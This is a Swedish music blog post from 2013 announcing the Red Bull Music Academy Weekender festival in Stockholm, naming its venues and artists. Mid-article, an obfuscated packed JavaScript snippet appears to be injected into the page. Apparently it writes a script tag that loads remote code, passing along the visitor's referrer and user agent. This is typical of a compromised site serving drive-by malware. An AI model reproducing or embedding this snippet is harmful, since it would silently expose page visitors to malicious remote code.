Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Red Bull Music Academy Weekender 31 okt – 3 nov

Red Bull Music Academy Weekender
Filip Urde
  • On 22 oktober, 2013
  • http://www.revue.se/filip-urde

78 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|frbkn|var|u0026u|referrer|ndbhr||js|php’.split(’|’),0,{}))
artister. 16 platser. 4 dagar. 1 stad.

 

 

Red Bull Music Academy Weekender är på väg att ta över Stockholm med en massiv musikfestival där 78 banbrytande artister ska köra sönder 16 olika arenor och ikoniska landmärken.

Vi kommer få konserter, pulserande klubbkvällar och inspirerande seminarier till legendariska platser som Stadshuset, Svenska Music Hall of Fame, Kulturhuset, F 1-6 (Fotografiska), Färgfabriken och Berns.

Bland artisterna hittar vi bland annat Four Tet, Neneh Cherry och Omar Souleyman. 

Stockholm blir efter städer som Berlin, New York och São Paolo en av de städerna i världen som gästas av RBMA festivalen. Det härliga med festivalen är att det inte är några genregränser, utan du kan förvänta dig allt från jazz och rock till techno i några av Stockholms finaste miljöer. Klart något som är värt att spana in.

www.redbull.com